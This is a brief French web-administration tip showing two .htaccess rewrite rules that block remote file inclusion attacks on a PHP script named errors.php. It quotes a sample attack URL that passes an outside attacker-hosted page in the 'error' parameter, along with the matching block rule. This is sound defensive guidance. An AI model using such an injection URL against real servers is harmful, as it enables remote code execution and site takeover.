HTACCESS

Bloquer le hacking avec le script errors.php

Les failles de sécurité sont nombreuses dans les scripts php.

Celle ci permet à un hacker d'exécuter sur votre serveur un include externe par l'intermédiaire du paramètre error du script errors.php.

Pour vous prémunir d'une prise de contrôle de votre site par un pirate du net il vous faut ajouter ces deux lignes dans votre fichier .htaccess qui vont bloquer l'accès à ce script en retournant un code retour 403.

Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com//errors.php?error=http://www.sitepourri.com/page.txt?

RewriteCond %{QUERY_STRING} ^(.*&)?error=http://
RewriteRule ^(.*/)?errors.php - [F,L]
PHP